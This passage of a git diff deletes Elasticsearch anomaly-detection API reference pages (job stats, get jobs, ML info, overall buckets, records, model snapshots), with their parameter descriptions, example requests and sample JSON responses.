- -`transport_address`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-transport-address] -==== -//End node - -`open_time`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=open-time] - -`state`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-anomaly-job] - -//Begin timing_stats -[[timingstats]]`timing_stats`:: -(object) An object that provides statistical information about timing aspect of -this job. -+ -.Properties of `timing_stats` -[%collapsible%open] -==== -`average_bucket_processing_time_ms`::: -(double) Average of all bucket processing times in milliseconds. - -`bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`exponential_average_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average] - -`exponential_average_bucket_processing_time_per_hour_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average-hour] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`maximum_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-maximum] - -`minimum_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-minimum] - -`total_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-total] -==== -//End timing_stats - -[[ml-get-job-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-job-stats-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/low_request_rate/_stats --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The API returns the following results: -[source,js] ----- -{ - "count" : 1, - "jobs" : [ - { - "job_id" : "low_request_rate", - "data_counts" : { - "job_id" : "low_request_rate", - "processed_record_count" : 1216, - "processed_field_count" : 1216, - "input_bytes" : 51678, - "input_field_count" : 1216, - "invalid_date_count" : 0, - "missing_field_count" : 0, - "out_of_order_timestamp_count" : 0, - "empty_bucket_count" : 242, - "sparse_bucket_count" : 0, - "bucket_count" : 1457, - "earliest_record_timestamp" : 1575172659612, - "latest_record_timestamp" : 1580417369440, - "last_data_time" : 1576017595046, - "latest_empty_bucket_timestamp" : 1580356800000, - "input_record_count" : 1216 - }, - "model_size_stats" : { - "job_id" : "low_request_rate", - "result_type" : "model_size_stats", - "model_bytes" : 41480, - "model_bytes_exceeded" : 0, - "model_bytes_memory_limit" : 10485760, - "total_by_field_count" : 3, - "total_over_field_count" : 0, - "total_partition_field_count" : 2, - "bucket_allocation_failures_count" : 0, - "memory_status" : "ok", - "categorized_doc_count" : 0, - "total_category_count" : 0, - "frequent_category_count" : 0, - "rare_category_count" : 0, - "dead_category_count" : 0, - "failed_category_count" : 0, - "categorization_status" : "ok", - "log_time" : 1576017596000, - "timestamp" : 1580410800000 - }, - "forecasts_stats" : { - "total" : 1, - "forecasted_jobs" : 1, - "memory_bytes" : { - "total" : 9179.0, - "min" : 9179.0, - "avg" : 9179.0, - "max" : 9179.0 - }, - "records" : { - 
"total" : 168.0, - "min" : 168.0, - "avg" : 168.0, - "max" : 168.0 - }, - "processing_time_ms" : { - "total" : 40.0, - "min" : 40.0, - "avg" : 40.0, - "max" : 40.0 - }, - "status" : { - "finished" : 1 - } - }, - "state" : "opened", - "node" : { - "id" : "7bmMXyWCRs-TuPfGJJ_yMw", - "name" : "node-0", - "ephemeral_id" : "hoXMLZB0RWKfR9UPPUCxXX", - "transport_address" : "127.0.0.1:9300", - "attributes" : { - "ml.machine_memory" : "17179869184", - "xpack.installed" : "true", - "ml.max_open_jobs" : "20" - } - }, - "assignment_explanation" : "", - "open_time" : "13s", - "timing_stats" : { - "job_id" : "low_request_rate", - "bucket_count" : 1457, - "total_bucket_processing_time_ms" : 1094.000000000001, - "minimum_bucket_processing_time_ms" : 0.0, - "maximum_bucket_processing_time_ms" : 48.0, - "average_bucket_processing_time_ms" : 0.75085792724777, - "exponential_average_bucket_processing_time_ms" : 0.5571716855800993, - "exponential_average_bucket_processing_time_per_hour_ms" : 15.0 - } - } - ] -} ----- \ No newline at end of file diff --git a/docs/reference/ml/anomaly-detection/apis/get-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-job.asciidoc deleted file mode 100644 index fe89201d3e1..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-job.asciidoc +++ /dev/null @@ -1,150 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-job]] -= Get {anomaly-jobs} API -++++ -Get jobs -++++ - -Retrieves configuration information for {anomaly-jobs}. - -[[ml-get-job-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors/` + - -`GET _ml/anomaly_detectors/,` + - -`GET _ml/anomaly_detectors/` + - -`GET _ml/anomaly_detectors/_all` - -[[ml-get-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-job-desc]] -== {api-description-title} - -You can get information for multiple {anomaly-jobs} in a single API request by -using a group name, a comma-separated list of jobs, or a wildcard expression. -You can get information for all {anomaly-jobs} by using `_all`, by specifying -`*` as the ``, or by omitting the ``. - -IMPORTANT: This API returns a maximum of 10,000 jobs. - -[[ml-get-job-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-default] - -[[ml-get-job-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -[[ml-get-job-results]] -== {api-response-body-title} - -The API returns an array of {anomaly-job} resources. For the full list of -properties, see <>. - -`create_time`:: -(string) The time the job was created. For example, `1491007356077`. This -property is informational; you cannot change its value. - -`finished_time`:: -(string) If the job closed or failed, this is the time the job finished. -Otherwise, it is `null`. This property is informational; you cannot change its -value. - -`job_type`:: -(string) Reserved for future use, currently set to `anomaly_detector`. - -`job_version`:: -(string) The version of {es} that existed on the node when the job was created. 
- -`model_snapshot_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -[[ml-get-job-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/high_sum_total_sales --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The API returns the following results: - -[source,js] ----- -{ - "count": 1, - "jobs": [ - { - "job_id" : "high_sum_total_sales", - "job_type" : "anomaly_detector", - "job_version" : "7.5.0", - "groups" : [ - "kibana_sample_data", - "kibana_sample_ecommerce" - ], - "description" : "Find customers spending an unusually high amount in an hour", - "create_time" : 1577221534700, - "analysis_config" : { - "bucket_span" : "1h", - "detectors" : [ - { - "detector_description" : "High total sales", - "function" : "high_sum", - "field_name" : "taxful_total_price", - "over_field_name" : "customer_full_name.keyword", - "detector_index" : 0 - } - ], - "influencers" : [ - "customer_full_name.keyword", - "category.keyword" - ] - }, - "analysis_limits" : { - "model_memory_limit" : "10mb", - "categorization_examples_limit" : 4 - }, - "data_description" : { - "time_field" : "order_date", - "time_format" : "epoch_ms" - }, - "model_plot_config" : { - "enabled" : true - }, - "model_snapshot_retention_days" : 10, - "daily_model_snapshot_retention_after_days" : 1, - "custom_settings" : { - "created_by" : "ml-module-sample", - ... - }, - "model_snapshot_id" : "1575402237", - "results_index_name" : "shared", - "allow_lazy_open" : false - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-ml-info.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-ml-info.asciidoc deleted file mode 100644 index 17250027828..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-ml-info.asciidoc +++ /dev/null @@ -1,127 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[get-ml-info]] -= Get machine learning info API - -[subs="attributes"] -++++ -Get {ml} info -++++ - -Returns defaults and limits used by machine learning. - -[[get-ml-info-request]] -== {api-request-title} - -`GET _ml/info` - -[[get-ml-info-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <> and -{ml-docs-setup-privileges}. - -[[get-ml-info-desc]] -== {api-description-title} - -This endpoint is designed to be used by a user interface that needs to fully -understand machine learning configurations where some options are not specified, -meaning that the defaults should be used. This endpoint may be used to find out -what those defaults are. 
- -[[get-ml-info-example]] -== {api-examples-title} - -The endpoint takes no arguments: - -[source,console] --------------------------------------------------- -GET _ml/info --------------------------------------------------- -// TEST - -This is a possible response: - -[source,console-result] ----- -{ - "defaults" : { - "anomaly_detectors" : { - "categorization_analyzer" : { - "tokenizer" : "ml_classic", - "filter" : [ - { - "type" : "stop", - "stopwords" : [ - "Monday", - "Tuesday", - "Wednesday", - "Thursday", - "Friday", - "Saturday", - "Sunday", - "Mon", - "Tue", - "Wed", - "Thu", - "Fri", - "Sat", - "Sun", - "January", - "February", - "March", - "April", - "May", - "June", - "July", - "August", - "September", - "October", - "November", - "December", - "Jan", - "Feb", - "Mar", - "Apr", - "May", - "Jun", - "Jul", - "Aug", - "Sep", - "Oct", - "Nov", - "Dec", - "GMT", - "UTC" - ] - } - ] - }, - "model_memory_limit" : "1gb", - "categorization_examples_limit" : 4, - "model_snapshot_retention_days" : 10, - "daily_model_snapshot_retention_after_days" : 1 - }, - "datafeeds" : { - "scroll_size" : 1000 - } - }, - "upgrade_mode": false, - "native_code" : { - "version": "7.0.0", - "build_hash": "99a07c016d5a73" - }, - "limits" : { - "effective_max_model_memory_limit": "28961mb" - } -} ----- -// TESTRESPONSE[s/"upgrade_mode": false/"upgrade_mode": $body.upgrade_mode/] -// TESTRESPONSE[s/"version": "7.0.0",/"version": "$body.native_code.version",/] -// TESTRESPONSE[s/"build_hash": "99a07c016d5a73"/"build_hash": "$body.native_code.build_hash"/] -// TESTRESPONSE[s/"effective_max_model_memory_limit": "28961mb"/"effective_max_model_memory_limit": "$body.limits.effective_max_model_memory_limit"/] -// TESTRESPONSE[s/"total_ml_memory": "86883mb"/"total_ml_memory": "$body.limits.total_ml_memory"/] -// TESTRESPONSE[skip:"AwaitsFix https://github.com/elastic/elasticsearch/issues/66629"] diff --git a/docs/reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc deleted file mode 100644 index 78040a54987..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc +++ /dev/null @@ -1,212 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-overall-buckets]] -= Get overall buckets API -++++ -Get overall buckets -++++ - -Retrieves overall bucket results that summarize the bucket results of multiple -{anomaly-jobs}. - -[[ml-get-overall-buckets-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/overall_buckets` + - -`GET _ml/anomaly_detectors/,/results/overall_buckets` + - -`GET _ml/anomaly_detectors/_all/results/overall_buckets` - -[[ml-get-overall-buckets-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-overall-buckets-desc]] -== {api-description-title} - -You can summarize the bucket results for all {anomaly-jobs} by using `_all` or -by specifying `*` as the ``. - -By default, an overall bucket has a span equal to the largest bucket span of the -specified {anomaly-jobs}. To override that behavior, use the optional -`bucket_span` parameter. To learn more about the concept of buckets, see -{ml-docs}/ml-buckets.html[Buckets]. 
- -The `overall_score` is calculated by combining the scores of all the buckets -within the overall bucket span. First, the maximum `anomaly_score` per -{anomaly-job} in the overall bucket is calculated. Then the `top_n` of those -scores are averaged to result in the `overall_score`. This means that you can -fine-tune the `overall_score` so that it is more or less sensitive to the number -of jobs that detect an anomaly at the same time. For example, if you set `top_n` -to `1`, the `overall_score` is the maximum bucket score in the overall bucket. -Alternatively, if you set `top_n` to the number of jobs, the `overall_score` is -high only when all jobs detect anomalies in that overall bucket. If you set -the `bucket_span` parameter (to a value greater than its default), the -`overall_score` is the maximum `overall_score` of the overall buckets that have -a span equal to the jobs' largest bucket span. - -[[ml-get-overall-buckets-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-wildcard-list] - -[[ml-get-overall-buckets-request-body]] -== {api-request-body-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -`bucket_span`:: -(Optional, string) The span of the overall buckets. Must be greater or equal to -the largest bucket span of the specified {anomaly-jobs}, which is the default -value. - -`end`:: -(Optional, string) Returns overall buckets with timestamps earlier than this -time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] -+ --- -If any of the job bucket results within the overall bucket interval are interim -results, the overall bucket results are interim results. --- - -`overall_score`:: -(Optional, double) Returns overall buckets with overall scores greater than or -equal to this value. - -`start`:: -(Optional, string) Returns overall buckets with timestamps after this time. - -`top_n`:: -(Optional, integer) The number of top {anomaly-job} bucket scores to be used in -the `overall_score` calculation. The default value is `1`. - -[[ml-get-overall-buckets-results]] -== {api-response-body-title} - -The API returns an array of overall bucket objects, which have the following -properties: - -`bucket_span`:: -(number) The length of the bucket in seconds. Matches the job with the longest `bucket_span` value. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`jobs`:: -(array) An array of objects that contain the `max_anomaly_score` per `job_id`. - -`overall_score`:: -(number) The `top_n` average of the maximum bucket `anomaly_score` per job. - -`result_type`:: -(string) Internal. This is always set to `overall_bucket`. - -`timestamp`:: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timestamp-results] - -[[ml-get-overall-buckets-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/job-*/results/overall_buckets -{ - "overall_score": 80, - "start": "1403532000000" -} --------------------------------------------------- -// TEST[skip:todo] - -In this example, the API returns a single result that matches the specified -score and time constraints. 
The `overall_score` is the max job score as -`top_n` defaults to 1 when not specified: -[source,js] ----- -{ - "count": 1, - "overall_buckets": [ - { - "timestamp" : 1403532000000, - "bucket_span" : 3600, - "overall_score" : 80.0, - "jobs" : [ - { - "job_id" : "job-1", - "max_anomaly_score" : 30.0 - }, - { - "job_id" : "job-2", - "max_anomaly_score" : 10.0 - }, - { - "job_id" : "job-3", - "max_anomaly_score" : 80.0 - } - ], - "is_interim" : false, - "result_type" : "overall_bucket" - } - ] -} ----- - -The next example is similar but this time `top_n` is set to `2`: - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/job-*/results/overall_buckets -{ - "top_n": 2, - "overall_score": 50.0, - "start": "1403532000000" -} --------------------------------------------------- -// TEST[skip:todo] - -Note how the `overall_score` is now the average of the top 2 job scores: -[source,js] ----- -{ - "count": 1, - "overall_buckets": [ - { - "timestamp" : 1403532000000, - "bucket_span" : 3600, - "overall_score" : 55.0, - "jobs" : [ - { - "job_id" : "job-1", - "max_anomaly_score" : 30.0 - }, - { - "job_id" : "job-2", - "max_anomaly_score" : 10.0 - }, - { - "job_id" : "job-3", - "max_anomaly_score" : 80.0 - } - ], - "is_interim" : false, - "result_type" : "overall_bucket" - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-record.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-record.asciidoc deleted file mode 100644 index 7b85f8223e0..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-record.asciidoc +++ /dev/null @@ -1,245 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-record]] -= Get records API -++++ -Get records -++++ - -Retrieves anomaly records for an {anomaly-job}. - -[[ml-get-record-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/records` - -[[ml-get-record-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-record-desc]] -== {api-description-title} - -Records contain the detailed analytical results. They describe the anomalous -activity that has been identified in the input data based on the detector -configuration. - -There can be many anomaly records depending on the characteristics and size of -the input data. In practice, there are often too many to be able to manually -process them. The {ml-features} therefore perform a sophisticated aggregation of -the anomaly records into buckets. - -The number of record results depends on the number of anomalies found in each -bucket, which relates to the number of time series being modeled and the number -of detectors. - -[[ml-get-record-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-get-record-request-body]] -== {api-request-body-title} - -`desc`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=desc-results] - -`end`:: -(Optional, string) Returns records with timestamps earlier than this time. 
- -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] - -`page`.`from`:: -(Optional, integer) Skips the specified number of records. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of records to obtain. - -`record_score`:: -(Optional, double) Returns records with anomaly scores greater or equal than -this value. - -`sort`:: -(Optional, string) Specifies the sort field for the requested records. By -default, the records are sorted by the `anomaly_score` value. - -`start`:: -(Optional, string) Returns records with timestamps after this time. - -[[ml-get-record-results]] -== {api-response-body-title} - -The API returns an array of record objects, which have the following properties: - -`actual`:: -(array) The actual value for the bucket. - -`bucket_span`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`by_field_name`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=by-field-name] - -`by_field_value`:: -(string) The value of the by field. - -`causes`:: -(array) For population analysis, an over field must be specified in the detector. -This property contains an array of anomaly records that are the causes for the -anomaly that has been identified for the over field. If no over fields exist, -this field is not present. This sub-resource contains the most anomalous records -for the `over_field_name`. For scalability reasons, a maximum of the 10 most -significant causes of the anomaly are returned. As part of the core analytical -modeling, these low-level anomaly records are aggregated for their parent over -field record. The causes resource contains similar elements to the record -resource, namely `actual`, `typical`, `geo_results.actual_point`, -`geo_results.typical_point`, `*_field_name` and `*_field_value`. Probability and -scores are not applicable to causes. - -`detector_index`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-index] - -`field_name`:: -(string) Certain functions require a field to operate on, for example, `sum()`. -For those functions, this value is the name of the field to be analyzed. - -`function`:: -(string) The function in which the anomaly occurs, as specified in the -detector configuration. For example, `max`. - -`function_description`:: -(string) The description of the function in which the anomaly occurs, as -specified in the detector configuration. - -`geo_results.actual_point`:: -(string) The actual value for the bucket formatted as a `geo_point`. If the -detector function is `lat_long`, this is a comma delimited string of the -latitude and longitude. - -`geo_results.typical_point`:: -(string) The typical value for the bucket formatted as a `geo_point`. If the -detector function is `lat_long`, this is a comma delimited string of the -latitude and longitude. - -`influencers`:: -(array) If `influencers` was specified in the detector configuration, this array -contains influencers that contributed to or were to blame for an anomaly. - -`initial_record_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the anomalousness of this record. This is the initial value that was calculated -at the time the bucket was processed. 
- -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`over_field_name`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=over-field-name] - -`over_field_value`:: -(string) The value of the over field. - -`partition_field_name`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=partition-field-name] - -`partition_field_value`:: -(string) The value of the partition field. - -`probability`:: -(number) The probability of the individual anomaly occurring, in the range `0` -to `1`. This value can be held to a high precision of over 300 decimal places, -so the `record_score` is provided as a human-readable and friendly -interpretation of this. - -`multi_bucket_impact`:: -(number) an indication of how strongly an anomaly is multi bucket or single -bucket. The value is on a scale of `-5.0` to `+5.0` where `-5.0` means the -anomaly is purely single bucket and `+5.0` means the anomaly is purely multi -bucket. - -`record_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the anomalousness of this record. Unlike `initial_record_score`, this value will -be updated by a re-normalization process as new data is analyzed. - -`result_type`:: -(string) Internal. This is always set to `record`. - -`timestamp`:: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timestamp-results] - -`typical`:: -(array) The typical value for the bucket, according to analytical modeling. - -NOTE: Additional record properties are added, depending on the fields being -analyzed. For example, if it's analyzing `hostname` as a _by field_, then a field -`hostname` is added to the result document. This information enables you to -filter the anomaly results more easily. - -[[ml-get-record-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/low_request_rate/results/records -{ - "sort": "record_score", - "desc": true, - "start": "1454944100000" -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API returns twelve results for the specified -time constraints: -[source,js] ----- -{ - "count" : 4, - "records" : [ - { - "job_id" : "low_request_rate", - "result_type" : "record", - "probability" : 1.3882308899968812E-4, - "multi_bucket_impact" : -5.0, - "record_score" : 94.98554565630553, - "initial_record_score" : 94.98554565630553, - "bucket_span" : 3600, - "detector_index" : 0, - "is_interim" : false, - "timestamp" : 1577793600000, - "function" : "low_count", - "function_description" : "count", - "typical" : [ - 28.254208230188834 - ], - "actual" : [ - 0.0 - ] - }, - ... - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-snapshot.asciidoc deleted file mode 100644 index 7219089922f..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-snapshot.asciidoc +++ /dev/null @@ -1,253 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-snapshot]] -= Get model snapshots API -++++ -Get model snapshots -++++ - -Retrieves information about model snapshots. 
- -[[ml-get-snapshot-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//model_snapshots` + - -`GET _ml/anomaly_detectors//model_snapshots/` - -[[ml-get-snapshot-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] -+ --- -You can get multiple snapshots for a single job in a single API request -by using a comma-separated list of `` or a wildcard expression. -You can get all snapshots by using `_all`, -by specifying `*` as the ``, or by omitting the ``. --- - -[[ml-get-snapshot-request-body]] -== {api-request-body-title} - -`desc`:: - (Optional, Boolean) If true, the results are sorted in descending order. - -`end`:: - (Optional, date) Returns snapshots with timestamps earlier than this time. - -`from`:: - (Optional, integer) Skips the specified number of snapshots. - -`size`:: - (Optional, integer) Specifies the maximum number of snapshots to obtain. - -`sort`:: - (Optional, string) Specifies the sort field for the requested snapshots. By - default, the snapshots are sorted by their timestamp. - -`start`:: - (Optional, string) Returns snapshots with timestamps after this time. - -[role="child_attributes"] -[[ml-get-snapshot-results]] -== {api-response-body-title} - -The API returns an array of model snapshot objects, which have the following -properties: - -`description`:: -(string) An optional description of the job. - -`job_id`:: -(string) A numerical character string that uniquely identifies the job that -the snapshot was created for. - -`latest_record_time_stamp`:: -(date) The timestamp of the latest processed record. - -`latest_result_time_stamp`:: -(date) The timestamp of the latest bucket result. - -`min_version`:: -(string) The minimum version required to be able to restore the model snapshot. - -//Begin model_size_stats -`model_size_stats`:: -(object) Summary information describing the model. -+ -.Properties of `model_size_stats` -[%collapsible%open] -==== -`bucket_allocation_failures_count`::: -(long) The number of buckets for which entities were not processed due to memory -limit constraints. - -`categorized_doc_count`::: -(long) The number of documents that have had a field categorized. - -`categorization_status`::: -(string) The status of categorization for this job. -Contains one of the following values. -+ --- -* `ok`: Categorization is performing acceptably well (or not being -used at all). -* `warn`: Categorization is detecting a distribution of categories -that suggests the input data is inappropriate for categorization. -Problems could be that there is only one category, more than 90% of -categories are rare, the number of categories is greater than 50% of -the number of categorized documents, there are no frequently -matched categories, or more than 50% of categories are dead. - --- - -`dead_category_count`::: -(long) The number of categories created by categorization that will -never be assigned again because another category's definition -makes it a superset of the dead category. (Dead categories are a -side effect of the way categorization has no prior training.)
- -`failed_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=failed-category-count] - -`frequent_category_count`::: -(long) The number of categories that match more than 1% of categorized -documents. - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`log_time`::: -(date) The timestamp that the `model_size_stats` were recorded, according to -server time. - -`memory_status`::: -(string) The status of the memory in relation to its `model_memory_limit`. -Contains one of the following values. -+ --- -* `hard_limit`: The internal models require more space than the configured -memory limit. Some incoming data could not be processed. -* `ok`: The internal models stayed below the configured value. -* `soft_limit`: The internal models require more than 60% of the configured -memory limit and more aggressive pruning will be performed in order to try to -reclaim space. --- - -`model_bytes`::: -(long) An approximation of the memory resources required for this analysis. - -`model_bytes_exceeded`::: -(long) The number of bytes over the high limit for memory usage at the last allocation failure. - -`model_bytes_memory_limit`::: -(long) The upper limit for memory usage, checked on increasing values. - -`rare_category_count`::: -(long) The number of categories that match just one categorized document. - -`result_type`::: -(string) Internal. This value is always `model_size_stats`. - -`timestamp`::: -(date) The timestamp that the `model_size_stats` were recorded, according to the -bucket timestamp of the data. - -`total_by_field_count`::: -(long) The number of _by_ field values analyzed. Note that these are counted -separately for each detector and partition. - -`total_category_count`::: -(long) The number of categories created by categorization. - -`total_over_field_count`::: -(long) The number of _over_ field values analyzed. Note that these are counted -separately for each detector and partition. - -`total_partition_field_count`::: -(long) The number of _partition_ field values analyzed. -==== -//End model_size_stats - -`retain`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=retain] - -`snapshot_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -`snapshot_doc_count`:: -(long) For internal use only. - -`timestamp`:: -(date) The creation timestamp for the snapshot.
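The paging and sorting parameters described above can be combined in a single request. The following request is an illustrative sketch only; it reuses the `high_sum_total_sales` job from the example below and assumes that job exists. It asks for the two most recent snapshots:

[source,console]
--------------------------------------------------
GET _ml/anomaly_detectors/high_sum_total_sales/model_snapshots
{
  "sort": "timestamp",
  "desc": true,
  "size": 2
}
--------------------------------------------------
// TEST[skip:illustrative example]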
- -[[ml-get-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/high_sum_total_sales/model_snapshots -{ - "start": "1575402236000" -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API provides a single result: -[source,js] ----- -{ - "count" : 1, - "model_snapshots" : [ - { - "job_id" : "high_sum_total_sales", - "min_version" : "6.4.0", - "timestamp" : 1575402237000, - "description" : "State persisted due to job close at 2019-12-03T19:43:57+0000", - "snapshot_id" : "1575402237", - "snapshot_doc_count" : 1, - "model_size_stats" : { - "job_id" : "high_sum_total_sales", - "result_type" : "model_size_stats", - "model_bytes" : 1638816, - "model_bytes_exceeded" : 0, - "model_bytes_memory_limit" : 10485760, - "total_by_field_count" : 3, - "total_over_field_count" : 3320, - "total_partition_field_count" : 2, - "bucket_allocation_failures_count" : 0, - "memory_status" : "ok", - "categorized_doc_count" : 0, - "total_category_count" : 0, - "frequent_category_count" : 0, - "rare_category_count" : 0, - "dead_category_count" : 0, - "categorization_status" : "ok", - "log_time" : 1575402237000, - "timestamp" : 1576965600000 - }, - "latest_record_time_stamp" : 1576971072000, - "latest_result_time_stamp" : 1576965600000, - "retain" : false - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/index.asciidoc b/docs/reference/ml/anomaly-detection/apis/index.asciidoc deleted file mode 100644 index 7b3faaed20c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -include::ml-apis.asciidoc[leveloffset=+1] -//ADD -include::post-calendar-event.asciidoc[leveloffset=+2] -include::put-calendar-job.asciidoc[leveloffset=+2] -//CLOSE -include::close-job.asciidoc[leveloffset=+2] -//CREATE -include::put-job.asciidoc[leveloffset=+2] -include::put-calendar.asciidoc[leveloffset=+2] -include::put-datafeed.asciidoc[leveloffset=+2] -include::put-filter.asciidoc[leveloffset=+2] -//DELETE -include::delete-calendar.asciidoc[leveloffset=+2] -include::delete-datafeed.asciidoc[leveloffset=+2] -include::delete-calendar-event.asciidoc[leveloffset=+2] -include::delete-filter.asciidoc[leveloffset=+2] -include::delete-forecast.asciidoc[leveloffset=+2] -include::delete-job.asciidoc[leveloffset=+2] -include::delete-calendar-job.asciidoc[leveloffset=+2] -include::delete-snapshot.asciidoc[leveloffset=+2] 